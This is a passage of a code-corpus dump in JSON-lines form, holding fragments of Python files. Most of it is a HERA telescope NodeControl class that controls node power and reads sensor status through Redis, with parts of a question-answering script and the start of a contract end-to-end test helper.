output[0]\n\n\nif __name__ == '__main__':\n tag = sys.argv[1]\n del sys.argv[1]\n\n unittest.main()\n","sub_path":"rnaseq-cgl-pipeline/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"212886847","text":"#!/usr/bin/python3\n\nimport sys\nimport spacy\nimport re\nimport socket\n\nfrom sharedcode import *\nfrom xml.dom import minidom\n\nfrom s2020947 import get_answer_s2020947\nfrom s2576597 import get_answer_s2576597\nfrom s2995263 import get_answer_s2995263\n\n\n\n\n# Answer selection\ndef selectAnswers(line, answers1, answers2, answers3):\n output = list(set(answers1 + answers2 + answers3))\n # \"Yes Yes No\" => \"Yes No\" => \"Yes\"\n if \"Yes\" in output or \"yes\" in output and not \" or \" in line:\n return [\"Yes\"]\n # Check if there are two identical answers\n allanswers = [answers1, answers2, answers3]\n for List in allanswers:\n occurences = 0\n for List2 in allanswers:\n if List == List2 and List:\n occurences += 1\n if occurences > 1:\n return List\n # Remove duplicates\n if \" founded \" in line and answers2:\n return answers2\n if answers1:\n return answers1\n if answers2:\n return answers2\n return answers3\n\n\n\n# Start\n\nif socket.gethostname() == 'Aspire' or socket.gethostname() == 'DESKTOP-6OMO0PT':\n nlp = spacy.load(\"en\")\nelse:\n nlp = spacy.load(\"en_default\")\n\nxmldoc = minidom.parse(\"data/cleanquestions.xml\")\nitems = xmldoc.getElementsByTagName('question')\n \nprint(\"\\nReading anchor_texts to dictionary(about 20 seconds)\\nPlease wait...\")\nstart = time.time()\nanchor_dict = init_anchor_dict()\nprint(\"Completed in \" + str(time.time()-start) + \" seconds.\\n\")\n\ndebugLog(\"Ready\")\n\nfor item in items:\n line = item.getElementsByTagName('string')[0].firstChild.nodeValue\n temp = re.split('\\t', line)\n if len(temp) == 2:\n questionid = temp[0]\n question = temp[1]\n else:\n questionid = \"0\"\n question = line\n answers1 = answers2 = answers3 = []\n #try:\n answers2 = get_answer_s2020947(question, nlp, anchor_dict)\n #except:\n # pass\n #try:\n answers1 = get_answer_s2576597(question, nlp, anchor_dict)\n #except:\n # pass\n try:\n answers3 = get_answer_s2995263(question, nlp)\n except:\n pass\n #print(answers1, answers2, answers3)\n selected = selectAnswers(line, answers1, answers2, answers3)\n output = []\n output.append(str(questionid))\n for item in selected:\n output.append(str(item))\n print(str.join(\"\\t\", output))\n","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"116837383","text":"import json\nfrom datetime import datetime\nimport time\nfrom os import path as osp\nfrom . import send_receive, node_util, __version__\n\n\nMAX_NODES = 30\nOLD_AGE = 32000000 # old-age is just over a year seconds\nREDIS_KEEP_ALIVE_RESET_KEY = 'reset-node-keep-alive'\n\n\ndef get_redis_nodes(redisServer='redishost', count=None):\n nc = NodeControl(None, redisServer, count)\n return nc.nodes_in_redis\n\n\nclass NodeControl():\n \"\"\"\n This class is used to control power to PAM, FEM, and SNAP boards and\n get node status information through a Redis database.\n\n A range of nodes is requested when instantiated, then those are looked for\n in redis, then those are attempted to be connected. So:\n connected_nodes is a subset of nodes_in_redis is a subset of request_nodes\n Note that connected_nodes aren't necessarily connected, but the attempt just\n doesn't error out in a higher level sense. Using verdict/sentence can reduce\n to actually connected.\n\n It also provides a status for the White Rabbit\n\n Attributes\n ----------\n NC_KEY_INFO : dict\n Dictionary containing the redis status pre/post-fix information.\n hw : list\n List of hardware to check.\n power_switch : dict\n Power switch state.\n \"\"\"\n\n NC_KEY_INFO = {'wr_stat': ['status:wr:heraNode', 'wr', 'status:wr:'],\n 'nc_stat': ['status:node:', ''],\n 'nc_cmd': ['commands:node:', '']}\n hw = ['snap_relay', 'snap_0', 'snap_1', 'snap_2', 'snap_3', 'fem', 'pam']\n power_switch = {True: 'on', False: 'off'}\n\n def __init__(self, nodes, redisServer=\"redishost\", count=None, exclude_nodes=[]):\n \"\"\"\n Create a NodeControl class instance to query/control nodes.\n\n Parameters\n ----------\n nodes : int, list of int, 'all', None\n ID numbers of the nodes with which this instance of NodeControl will interact.\n If an IP address (or csv-list), then will just use those for communicating out.\n If 'all', will try 0-29.\n If None, it will _not_ get nodes_in_redis\n redisServer : str\n The hostname, or dotted quad IP address, of the machine running the node control and\n monitoring redis server\n count : int or None\n Number of status fields to make a node count as actually used.\n If None, reads from node_util.status_node\n exclude_nodes : list of ints (or empty)\n Will exclude these nodes.\n\n Attributes\n ----------\n request_nodes : list or None\n List of requested nodes (supplied)\n r : redis class\n Redis class to use\n nodes_in_redis : list\n List of all request_nodes in redis\n connected_nodes : list\n List of connected_nodes in nodes_in_redis\n sc_node : str\n String to print connected nodes\n status_node_keys : list\n List of the status:node keys\n \"\"\"\n self.explicit_ip = False\n self.r = node_util.get_redis_client(redisServer)\n self.set_request(nodes, exclude_nodes)\n self.reset_node_senders(full_reset=True)\n self.status_node_keys = list(node_util.status_node(None, None).keys())\n self.get_nodes_in_redis(count)\n\n def _get_stat_keys_from_redis(self):\n \"\"\"\n Go through redis and get all keys that start with the desired patterns.\n\n Called in get_nodes_in_redis.\n\n Attributes (from NC_KEY_INFO)\n ----------\n nc_stat : dict\n Redis key entries for status per node.\n nc_cmd : dict\n Redis key entries for commands per node.\n wr_stat : dict\n Redis key entries for wr status per node.\n\n \"\"\"\n for this_attr, key_info in self.NC_KEY_INFO.items():\n setattr(self, this_attr, {}) # set dictionary for nodes present\n for this_key in self.r.keys():\n for this_attr, key_info in self.NC_KEY_INFO.items():\n if this_key.startswith(key_info[0]):\n lstart = len(key_info[0])\n lstop = len(this_key) - len(key_info[1])\n try:\n this_node = int(this_key[lstart: lstop])\n except ValueError:\n continue\n getattr(self, this_attr)[this_node] = this_key\n\n def redis_keygen(self, rtype, nodeID):\n if nodeID > 29:\n return \"bad:nodeID:{}\".format(nodeID)\n if rtype == 'wr_stat' and str(nodeID).startswith('heraNode'):\n return \"{}{}\".format(self.NC_KEY_INFO[rtype][2], nodeID)\n return \"{}{}{}\".format(self.NC_KEY_INFO[rtype][0], nodeID, self.NC_KEY_INFO[rtype][1])\n\n def log_service_in_redis(self, this_file):\n rkey = \"version:{}:{}\".format(__package__, osp.basename(this_file))\n rval = {\"version\": __version__,\n \"timestamp\": datetime.now().isoformat()}\n self.r.hmset(rkey, rval)\n self.status_scriptname = \"status:script:{}:{}\".format(send_receive.THIS_HOST, this_file)\n\n def set_request(self, nodes, exclude_nodes):\n self.requested_nodes_query = nodes\n if isinstance(nodes, str):\n if nodes.lower() == 'all':\n self.request_nodes = list(range(MAX_NODES))\n elif '.' in nodes:\n self.explicit_ip = True\n self.request_nodes = nodes.split(',')\n else:\n try:\n self.request_nodes = [int(x) for x in nodes.split(',')]\n except ValueError:\n list_from_redis = self.r.get(nodes)\n if list_from_redis is not None:\n self.request_nodes = json.loads(list_from_redis)\n else:\n self.request_nodes = list(range(MAX_NODES))\n elif isinstance(nodes, (int, float)):\n self.request_nodes = [int(nodes)]\n elif isinstance(nodes, list) or nodes is None:\n self.request_nodes = nodes\n else:\n raise ValueError(f\"Invalid 'nodes' type: {nodes}\")\n for exno in exclude_nodes:\n if exno in self.request_nodes:\n self.request_nodes.remove(exno)\n\n def get_nodes_list_from_redis(self, nodes):\n self.r.get(nodes)\n\n def get_nodes_in_redis(self, count=None):\n \"\"\"\n Get redis nodes list for those in request_nodes.\n\n Parameters\n ----------\n count : int or None\n Number of status fields to make a node count as actually used.\n If None, get length from status_node_keys (all)\n\n Attributes\n ----------\n nodes_in_redis : list\n List of all request_nodes in redis with >count status fields\n \"\"\"\n self._get_stat_keys_from_redis() # gets self.nc_stat (and self.wr_stat and self.nc_cmd)\n if self.request_nodes is None or self.explicit_ip:\n return\n if count is None:\n count = len(self.status_node_keys)\n self.nodes_in_redis = []\n for node in self.request_nodes:\n if node not in self.nc_stat:\n continue\n try:\n ts = self.r.hget(self.nc_stat[node], 'timestamp')\n except KeyError:\n ts = 0\n if ts == -1:\n len_entries = len(self.status_node_keys) + 1\n else:\n len_entries = len(self.r.hgetall(self.nc_stat[node]))\n if node in self.nc_stat and len_entries >= count:\n self.nodes_in_redis.append(node)\n\n def reset_node_senders(self, full_reset=False):\n self.connected_nodes = []\n self.senders = {}\n self.requested_included = {}\n self.sc_node = ''\n if full_reset:\n self.nodes_in_redis = []\n\n def get_node_senders(self, throttle=0.1):\n \"\"\"\n Get udp node class for requested nodes that are in redis.\n\n Every node in redis gets a sender class, differ by sender.node_is_connected flag.\n\n Parameters\n ----------\n throttle : float\n waiting time\n\n Attributes\n ----------\n senders : dict\n Sender classes keyed on node_id (int)\n connected_nodes : list\n List of all udp connected request_nodes\n sc_node : str\n String to print connected nodes\n \"\"\"\n self.connected_nodes = []\n if self.explicit_ip:\n nodes_to_check = self.request_nodes\n else:\n nodes_to_check = self.nodes_in_redis\n for node in nodes_to_check:\n if node in self.senders.keys():\n if self.senders[node].node_is_connected:\n self.connected_nodes.append(node)\n else:\n hkey = self.redis_keygen('nc_stat', node)\n # ip = self.r.hget(hkey, 'ip') # use name not number\n if self.explicit_ip:\n ip = node\n else:\n ip = f\"heraNode{node}\"\n self.senders[node] = send_receive.UdpSenderReceiver(ip, throttle=throttle)\n if self.senders[node].node_is_connected:\n self.connected_nodes.append(node)\n _ping = self.senders[node].pingable\n self.r.hset(hkey, 'udp_status', 'ping {}/{} : {}s'\n .format(_ping['rcvd'], _ping['sent'], _ping['avg']))\n else:\n self.r.hset(hkey, 'udp_status', 'not connected')\n if len(self.connected_nodes):\n s = 's' if len(self.connected_nodes) > 1 else ''\n self.sc_node = \"Node{} {}\".format(s, ', '.join([str(x) for x in self.connected_nodes]))\n else:\n self.sc_node = \"No requested nodes connected.\"\n\n def get_sensors(self):\n \"\"\"\n Get the current node sensor values from redis.\n\n Returns a dict where `timestamp` is a python `time` float describing when the\n sensor values were last updated in redis, and `sensors` is a dictionary of sensor values.\n If a sensor value is not available (e.g. because it cannot be reached) it will be `None`\n\n Valid sensor keywords are:\n 'temp_top' (float) : Temperature, in degrees C, reported by top node sensor.\n 'temp_mid' (float) : Temperature, in degrees C, reported by middle node sensor.\n 'temp_bot' (float) : Temperature, in degrees C, reported by bottom node sensor.\n 'temp_humid' (float) : Temperature, in degrees C, reported by humidity sensor.\n 'humid' (float) : Relative Humidity, in percent, reported by humidity sensor.\n 'cpu_uptime_ms' (int) : Uptime of this node control module, in milliseconds\n 'ip' (str) : IP address of node controller module, e.g. \"10.1.1.123\"\n 'mac' (str) : MAC address of node controller module, e.g. \"02:03:04:05:06:07\"\n \"\"\"\n conv_methods = {\n \"temp_bot\": float,\n \"temp_mid\": float,\n \"temp_top\": float,\n \"temp_humid\": float,\n \"humid\": float,\n \"ip\": str,\n \"mac\": str,\n \"cpu_uptime_ms\": int,\n \"timestamp\": float\n }\n sensors = {}\n now = time.time()\n self.requested_included['sensor'] = []\n for node, stat_key in self.nc_stat.items():\n if self.request_nodes is not None and node in self.request_nodes:\n self.requested_included['sensor'].append(node)\n stats = self.r.hgetall(stat_key)\n sensors[node] = {'age': OLD_AGE}\n for key, convfunc in conv_methods.items():\n try:\n sensors[node][key] = convfunc(stats[key])\n if key == 'timestamp':\n try:\n sensors[node]['age'] = now - sensors[node][key]\n except ValueError:\n pass\n except: # noqa\n sensors[node][key] = None\n self.requested_included['sensor'] = sorted(self.requested_included['sensor'])\n return sensors\n\n def get_power_command_list(self):\n \"\"\"\n Get the current node power commands from redis.\n\n Returns a dict keyed on node|part|timestamp/age/command\n\n Valid power command keys are:\n power_snap_relay_cmd\n power_snap_0_cmd\n power_snap_1_cmd\n power_snap_2_cmd\n power_snap_3_cmd\n power_fem_cmd\n power_pam_cmd\n reset\n Format of values for all is on/off/reset|time(unix)\n \"\"\"\n valid = [\"power_{}_cmd\".format(x) for x in self.hw] + ['reset']\n power = {}\n now = time.time()\n for node, cmd_key in self.nc_cmd.items():\n statii = self.r.hgetall(cmd_key)\n power[node] = {}\n for key in list(statii.keys()):\n if key not in valid:\n continue\n if 'relay' in key:\n this_key = 'snap_relay'\n elif 'snap' in key:\n this_key = \"snap{}\".format(key.split('_')[2])\n elif 'reset' in key:\n this_key = 'reset'\n else:\n this_key = key.split('_')[1]\n stad = statii[key].split('|')\n try:\n this_timestamp = float(stad[1])\n this_age = now - this_timestamp\n except (IndexError, ValueError):\n this_timestamp = -99\n this_age = -99\n power[node][this_key] = {'timestamp': this_timestamp,\n 'age': this_age,\n 'command': stad[0]}\n return power\n\n def enable_snap_monitor(self, disabler='IGNORE'):\n \"\"\"\n If snap monitor was disabled by re-enable it.\n \"\"\"\n if self.r.exists('disable_monitoring'):\n disabled_by = self.r.get('disable_monitoring')\n if disabled_by == disabler:\n self.r.delete('disable_monitoring')\n return 'Enabling'\n return f'Not enabled since disabled by {disabled_by} not {disabler}'\n return 'Already enabled'\n\n def disable_snap_monitor(self, disabler='hera_node_mc.disable_snap_monitor'):\n \"\"\"\n Disable snap monitor attributing to .\n \"\"\"\n if not self.r.exists('disable_monitoring'):\n distag = \"{}:{}\".format(disabler, datetime.now().isoformat())\n self.r.set('disable_monitoring', distag)\n return 'Disabling'\n else:\n disabled_by = self.r.get('disable_monitoring')\n return f'Already disabled by {disabled_by}'\n\n def snap_monitor_check_and_set(self, age_cutoff=600.0):\n \"\"\"\n Check the powered state of all of the snaps and disable if appropriate.\n\n If nodes to use is 'all' and all snaps are off, set disable_monitoring flag\n in redis. If any are on and the disable flag was set by this method, remove\n the flag.\n\n Parameter\n =========\n age_cutoff : float\n time (sec) to use to cutoff using the power state\n \"\"\"\n power_data = self.get_power_status()\n # check all snaps and snap relay to allow monitoring.\n all_snap_off = True\n for node, pwr in power_data.items():\n if 'age' in pwr.keys() and pwr['age'] < age_cutoff:\n for key in ['power_snap_0', 'power_snap_1', 'power_snap_2', 'power_snap_3']:\n if key in pwr.keys() and pwr[key] is True:\n all_snap_off = False\n break\n if not all_snap_off:\n break\n if all_snap_off:\n return self.disable_snap_monitor('hera_node_mc.snap_monitor_check_and_set')\n return self.enable_snap_monitor('hera_node_mc.snap_monitor_check_and_set')\n\n def get_power_status(self):\n \"\"\"\n Get the current node power relay states from redis.\n\n Returns a dict where `timestamp` is a python `time` float\n describing when the values were last updated in redis, and `statii` is a dictionary\n of booleans for the various power switches the node can control. For each entry in this\n dictionary, `True` indicates power is on, `False` indicates power is off.\n\n Valid power status keys are:\n 'power_fem' (Power of Front-End modules)\n 'power_pam' (Power of Post-amplifier modules)\n 'power_snap_0' (Power of first SNAP)\n 'power_snap_1' (Power of second SNAP)\n 'power_snap_2' (Power of third SNAP)\n 'power_snap_3' (Power of fourth SNAP)\n 'power_snap_relay' (Power of master SNAP relay)\n \"\"\"\n power = {}\n now = time.time()\n self.requested_included['power'] = []\n for node, stat_key in self.nc_stat.items():\n if self.request_nodes is not None and node in self.request_nodes:\n self.requested_included['power'].append(node)\n statii = self.r.hgetall(stat_key)\n power[node] = {'age': OLD_AGE}\n for key in list(statii.keys()):\n if key == 'timestamp':\n try:\n power[node]['timestamp'] = float(statii[key])\n power[node]['age'] = now - float(statii[key])\n except ValueError:\n power[node]['timestamp'] = -99\n power[node]['age'] = -99\n elif key.startswith(\"power\"):\n power[node][key] = node_util.str2bool(statii[key])\n self.requested_included['power'] = sorted(self.requested_included['power'])\n return power\n\n def get_wr_status(self):\n \"\"\"\n Get the current status of this node's White Rabbit endpoint (assumed to have hostname\n `heraNodewr`) from redis.\n\n If no stats exist for this White Rabbit endpoint, returns `None`.\n\n Otherwise Returns a dict where `timestamp` is a python `timestamp` describing when\n the values were last updated in redis, and `statii` is a dictionary of status values.\n\n If a status value is not available it will be `None`\n\n Valid status keywords are:\n 'board_info_str' (str) : A raw string representing the WR-LEN's response to the\n `ver` command. Relevant parts of this string are\n individually unpacked in other entries.\n 'aliases' (list of strings) : Hostname aliases of this node's WR-LEN\n 'ip' (str) : IP address of this node's WR-LEN\n 'mode' (str) : WR-LEN operating mode (eg. \"WRC_SLAVE_WR0\")\n 'serial' (str) : Canonical HERA hostname (~=serial number) of node's WR-LEN\n 'temperature' (float) : WR-LEN temperature in degrees C\n 'sw_build_date' (timestamp) : Build date of WR-LEN software\n 'wr_gw_date' (timestamp) : WR-LEN gateware build date\n 'wr_gw_version' (str) : WR-LEN gateware version number\n 'wr_gw_id' (str) : WR-LEN gateware ID number\n 'wr_build' (str) : WR-LEN build git hash\n 'wr_fru_custom' (str) : Custom manufacturer tag'\n 'wr_fru_device' (str) : Manufacturer device name designation\n 'wr_fru_fid' (timestamp) : Manufacturer invoice(?) date\n 'wr_fru_partnum' (str) : Manufacturer part number\n 'wr_fru_serial' (str) : Manufacturer serial number\n 'wr_fru_vendor' (str) : Vendor name\n The following entries are prefixed `wr0` or `wr1` for WR-LEN ports 0 and 1,\n respectively. Most values will only be not None for one of the two ports.\n 'wr[0|1]_ad' (int) : ???\n 'wr[0|1]_asym' (int) : Total link asymmetry (ps)\n 'wr[0|1]_aux' (int) : ??? Manual phase adjustment (ps)\n 'wr[0|1]_cko' (int) : Clock offset (ps)\n 'wr[0|1]_crtt' (int) : Cable round-trip delay (ps)\n 'wr[0|1]_dms' (int) : Master-Slave delay in (ps)\n 'wr[0|1]_drxm' (int) : Master RX PHY delay (ps)\n 'wr[0|1]_drxs' (int) : Slave RX PHY delay (ps)\n 'wr[0|1]_dtxm' (int) : Master TX PHY delay (ps)\n 'wr[0|1]_dtxs' (int) : Slave TX PHY delay (ps)\n 'wr[0|1]_hd' (int) : ???\n 'wr[0|1]_lnk' (bool) : Link up state\n 'wr[0|1]_lock' (bool) : Timing lock state\n 'wr[0|1]_md' (int) : ???\n 'wr[0|1]_mu' (int) : Round-trip time (ps)\n 'wr[0|1]_nsec' (int) : ???\n 'wr[0|1]_rx' (int) : Number of packets received\n 'wr[0|1]_setp' (int) : Phase setpoint (ps)\n 'wr[0|1]_ss' (str) : Servo state\n 'wr[0|1]_sv' (int) : ???\n 'wr[0|1]_syncs' (str) : Source of synchronization (either 'wr0' or 'wr1')\n 'wr[0|1]_tx' (int) : Number of packets transmitted\n 'wr[0|1]_ucnt' (int) : Update counter\n 'wr[0|1]_sec' (int) : Current TAI time in seconds from UNIX epoch\n \"\"\"\n conv_methods = {\n 'board_info_str': str,\n 'aliases': json.loads,\n 'ip': str,\n 'mode': str,\n 'serial': str,\n 'temp': float,\n 'timestamp': str,\n 'sw_build_date': str,\n 'wr_gw_date': str,\n 'wr_gw_version': str,\n 'wr_gw_id': str,\n 'wr_build': str,\n 'wr_fru_custom': str,\n 'wr_fru_device': str,\n 'wr_fru_fid': str,\n 'wr_fru_partnum': str,\n 'wr_fru_serial': str,\n 'wr_fru_vendor': str,\n '_ad': int,\n '_asym': int,\n '_aux': int,\n '_cko': int,\n '_crtt': int,\n '_dms': int,\n '_drxm': int,\n '_drxs': int,\n '_dtxm': int,\n '_dtxs': int,\n '_hd': int,\n '_lnk': bool,\n '_lock': bool,\n '_md': int,\n '_mu': int,\n '_nsec': int,\n '_rx': int,\n '_setp': int,\n '_ss': str,\n '_sv': int,\n '_syncs': str,\n '_tx': int,\n '_ucnt': int,\n '_sec': int\n }\n wrstat = {}\n self.requested_included['wr'] = []\n for node, stat_key in self.wr_stat.items():\n if self.request_nodes is not None and node in self.request_nodes:\n self.requested_included['wr'].append(node)\n stats = self.r.hgetall(stat_key)\n wrstat[node] = {}\n for key, convfunc in conv_methods.items():\n if key.startswith('_'):\n for i in range(2):\n port_key = ('wr%d' % i) + key\n try:\n wrstat[node][port_key] = convfunc(stats[port_key])\n except: # noqa\n wrstat[node][port_key] = None\n else:\n try:\n wrstat[node][key] = convfunc(stats[key])\n except: # noqa\n wrstat[node][key] = None\n self.requested_included['wr'] = sorted(self.requested_included['wr'])\n return wrstat\n\n def verdict(self, hwcmd, verbose=True, hold_for_verify=120,\n verify_mode='all', show_success=False):\n \"\"\"\n Checks if commands are actually carried out - needs hera-node-receiver service running.\n\n Uses _verify_states to make sure the hardware commands were set as requested.\n Note that it bases off of connected_nodes, not requested_nodes.\n\n Parameters\n ----------\n hwcmd : dict\n Dict of hardware to check and the commands (on or off)\n hold_for_verify : int\n Length of time till timeout (seconds)\n verify_mode : str\n Type of verification to check (see _verify_states)\n show_success : bool\n Flag to also show success rather than just failure.\n \"\"\"\n if verbose:\n print(\"...Verifying...\", end='')\n lenhw = len(hwcmd.keys())\n if hold_for_verify <= 0:\n print(\"No verdict hold time - not checking.\")\n return\n elif not lenhw:\n print(\"No hardware to check verdict.\")\n return\n started = time.time()\n age = 0.0\n node_counter = {}\n all_verified = False\n while age < hold_for_verify:\n countdown = len(self.connected_nodes) * lenhw # total to check\n _verdict = self._verify_states(hwcmd)\n for node in self.connected_nodes:\n node_counter[node] = lenhw\n for this_hw in hwcmd.keys():\n if _verdict[node][this_hw][verify_mode]:\n countdown -= 1\n node_counter[node] -= 1\n if not countdown: # all OK so can quit loop\n all_verified = True\n if verbose:\n print(\"...all ok\")\n break\n time.sleep(1) # Wait 1 second for next check.\n age = time.time() - started\n if verbose and not all_verified:\n print(\"...timeout {:.1f}\".format(age))\n node_counter['hwcmd'] = hwcmd\n node_counter['mode'] = verify_mode\n node_counter['timeout'] = hold_for_verify\n node_counter['age'] = age\n node_counter['time'] = time.time()\n if verbose:\n for node in self.connected_nodes:\n for this_hw in _verdict[node].keys():\n if not _verdict[node][this_hw][verify_mode]:\n print(\"FAIL Node {} turned {} {}\".format(\n node, this_hw, hwcmd[this_hw]))\n elif show_success:\n print(\"SUCCESS Node {} turned {} {}\".format(\n node, this_hw, hwcmd[this_hw]))\n return node_counter\n\n def sentence(self, results, error_threshold=1.0, purge=True):\n \"\"\"\n Determine what to do with the verdict.\n\n Computes error fraction and will error out if exceeds threshold.\n\n Parameters\n ----------\n results : bool or dict\n Returned from self.verdict\n error_threshold : int\n Threshold fractional value per node over which to raise an error.\n 0.0 will error if there are any unsuccessful\n 1.0 will never error\n purge : bool\n If True, remove unsuccessful nodes from self.connected_nodes.\n\n Returns\n -------\n float\n computed error fraction: 0 - 1\n \"\"\"\n if results is None:\n return 0.0\n if isinstance(results, bool) and results:\n return 0.0 # All good (none failed)!\n failed = []\n incoming_total = len(self.connected_nodes)\n for node in self.connected_nodes:\n if results[node]: # there were some left over so didn't all work\n failed.append(node)\n if purge:\n self.connected_nodes.remove(node)\n error_fraction = len(failed) / incoming_total\n if error_threshold < 1.0 and error_fraction > error_threshold:\n msg = \"{} of {} nodes failed.\".format(len(failed), incoming_total)\n raise RuntimeError(msg)\n if purge and len(failed) > 0:\n print(\"{} removed from connected_nodes.\".format(failed))\n return error_fraction\n\n def _verify_states(self, hwcmd):\n \"\"\"\n Check the state of hardware in nodes - command and status.\n\n Parameters\n ----------\n hwcmd : dictionary of hardware and on/off command.\n\n Returns\n -------\n dict\n keyed on node, and mode: 'time', 'agree', 'cmd', 'stat', 'all'\n each one is a bool\n \"\"\"\n # Prep the lists.\n if 'all' in hwcmd.keys():\n verify_hw = self.hw\n verify_cmd = [hwcmd['all'] for x in verify_hw]\n else:\n verify_hw = list(hwcmd.keys())\n verify_cmd = [hwcmd[x] for x in verify_hw]\n verify_hw = [x.lower() for x in verify_hw]\n verify_cmd = [x.lower() for x in verify_cmd]\n\n # Get from redis\n pcmd = self.get_power_command_list()\n pstat = self.get_power_status()\n\n # Verify\n verification = {}\n for node in self.connected_nodes:\n verification[node] = {}\n for vhw, vcmd in zip(verify_hw, verify_cmd):\n verification[node][vhw] = {}\n shw = 'power_{}'.format(vhw)\n chw = vhw.replace('_', '') if 'relay' not in vhw else vhw\n try:\n verification[node][vhw]['time'] = (pcmd[node][chw]['timestamp'] <\n pstat[node]['timestamp'])\n except KeyError:\n verification[node][vhw]['time'] = False\n try:\n pcmdvhw = pcmd[node][chw]['command']\n except KeyError:\n pcmdvhw = None\n verification[node][vhw]['cmd'] = pcmdvhw == vcmd\n pstatvhw = 'on' if pstat[node][shw] else 'off'\n verification[node][vhw]['stat'] = pstatvhw == vcmd\n verification[node][vhw]['agree'] = pcmdvhw == pstatvhw\n verification[node][vhw]['all'] = True\n for thisv in ['time', 'cmd', 'stat', 'cmd']:\n if not verification[node][vhw][thisv]:\n verification[node][vhw]['all'] = False\n break\n return verification\n\n def _log_cmd_to_redis(self, node, component, tstamp, cmd):\n key = self.redis_keygen('nc_cmd', node)\n val = \"{}|{}\".format(cmd, tstamp)\n cmp = \"{}_cmd\".format(component)\n self.r.hset(key, cmp, val)\n\n def _change_state_nodes(self, command, hw, print_stat=False):\n if not len(self.connected_nodes):\n print(\"No nodes connected.\")\n return []\n pstat = self.get_power_status()\n change_node = []\n for cnode in self.connected_nodes:\n try:\n if command != self.power_switch[pstat[cnode][hw]]:\n change_node.append(cnode)\n except KeyError:\n change_node.append(cnode)\n if print_stat:\n prhw = hw.strip('power').replace('_', ' ').strip()\n if len(change_node):\n s = 's' if len(change_node) > 1 else ''\n prnd = \"Node{} {}\".format(s, ', '.join([str(x) for x in change_node]))\n print(\"Turning {} {}{} for {}\".format(command, prhw, s, prnd))\n else:\n s = 's' if len(self.connected_nodes) > 1 else ''\n print(\"{}{} already {}\".format(prhw, s, command))\n return change_node\n\n def power_snap_relay(self, command, hold_for_verify=120, verify_mode='all'):\n \"\"\"\n Controls the node snap relay via arduino.\n\n The SNAP relay has to be turn on before sending commands to individual SNAPs.\n It logs the command to redis as status:node:N->power_snap_relay_cmd. If turning on,\n it checks for success, since 1st of 2 stages to turn on SNAPs.\n\n Parameter\n ---------\n command : str\n on or off\n hold_for_verify : int\n Since the snap_relay has to be on first, you can hold that many seconds until\n it is verified that it is on (only on, not off). Ignore if 0.\n verify_mode : str\n One of the keys in the verification dict\n \"\"\"\n change_node = self._change_state_nodes(command, 'power_snap_relay', print_stat=True)\n if not len(change_node):\n return\n tstamp = int(time.time())\n for node in change_node:\n self._log_cmd_to_redis(node, 'power_snap_relay', tstamp, command)\n self.senders[node].power_snap_relay(command)\n if command == 'on' and hold_for_verify > 0:\n _r = self.verdict({'snap_relay': 'on'}, False,\n hold_for_verify=hold_for_verify, verify_mode=verify_mode)\n self.snap_relay_error_fraction = self.sentence(_r, 1.0, purge=True)\n\n def power_snap(self, snap_n, command):\n \"\"\"\n Controls the power to snaps via arduino.\n\n It logs the command to redis as status:node:N->power_snap_N_cmd.\n\n Parameters\n ----------\n snap_n : int (or str representation of int)\n Number of snap to address.\n command : str\n on or off\n \"\"\"\n this_snap = f\"power_snap_{snap_n}\"\n change_node = self._change_state_nodes(command, this_snap, print_stat=True)\n if not len(change_node):\n return\n tstamp = int(time.time())\n for node in change_node:\n self._log_cmd_to_redis(node, this_snap, tstamp, command)\n self.senders[node].power_snap(snap_n, command)\n\n def power_fem(self, command):\n \"\"\"\n Controls the power to FEM via arduino.\n\n It logs the command to redis as status:node:N->power_fem_cmd.\n\n Parameter\n ---------\n command : str\n on or off\n \"\"\"\n change_node = self._change_state_nodes(command, 'power_fem', print_stat=True)\n if not len(change_node):\n return\n tstamp = int(time.time())\n for node in change_node:\n self._log_cmd_to_redis(node, 'power_fem', tstamp, command)\n self.senders[node].power_fem(command)\n\n def power_pam(self, command):\n \"\"\"\n Controls the power to PAM via arduino.\n\n It logs the command to redis as status:node:N->power_pam_cmd.\n\n Parameter\n ---------\n command : str\n on or off\n \"\"\"\n change_node = self._change_state_nodes(command, 'power_pam', print_stat=True)\n if not len(change_node):\n return\n tstamp = int(time.time())\n for node in change_node:\n self._log_cmd_to_redis(node, 'power_pam', tstamp, command)\n self.senders[node].power_pam(command)\n\n def reset(self):\n \"\"\"\n Sends the reset command to Arduino which restarts the bootloader.\n\n It logs the command to redis as status:node:N->reset\n \"\"\"\n if not len(self.connected_nodes):\n print(\"No nodes connected.\")\n return\n tstamp = int(time.time())\n print(\"Resetting {}\".format(self.sc_node))\n for node in self.connected_nodes:\n self._log_cmd_to_redis(node, 'reset', tstamp, 'reset')\n self.senders[node].reset()\n","sub_path":"node_control/node_control.py","file_name":"node_control.py","file_ext":"py","file_size_in_byte":35204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"168683884","text":"# Copyright @ 2021 Thought Machine Group Limited. All rights reserved.\n\n# standard libs\nimport hashlib\nimport json\nimport logging\nimport os\nimport random\nimport re\nimport string\nimport unittest\nimport uuid\nfrom typing import Any, Dict, List, Union\n\n# common\nimport common.test_utils.endtoend as endtoend\nfrom common.test_utils.common.utils import replace_supervisee_version_ids_in_supervisor\nfrom common.test_utils.endtoend.kafka_helper import kafka_only_helper, wait_for_messages\n\nlog = logging.getLogger(__name__)\nlogging.basicConfig(\n level=os.environ.get(\"LOGLEVEL\", \"INFO\"),\n format=\"%(asctime)s.%(msecs)03d - %(levelname)s: %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n)\n\n\nPLAN_UPDATE_EVENTS_TOPIC = \"vault.core_api.v1.plans.plan_update.events\"\n\nTERMINAL_PLAN_STATUSES = [\n \"PLAN_UPDATE_STATUS_REJECTED\",\n \"PLAN_UPDATE_STATUS_ERRORED\",\n \"PLAN_UPDATE_STATUS_COMPLETED\",\n]\n\n\ndef create_supervisor_contract(display_name, supervisor_contract_id=\"\"):\n display_name = display_name\n randomchars = \"\".join(random.choice(string.ascii_letters) for x in range(10))\n supervisor_contract_id = supervisor_contract_id + randomchars\n request_hash = str(\n hashlib.md5(\n (display_name + supervisor_contract_id or \"\").encode(\"utf-8\")\n ).hexdigest()\n )\n\n post_body = {\n \"supervisor_contract\": {\n \"id\": supervisor_contract_id,\n \"display_name\": display_name,\n },\n \"request_id\": 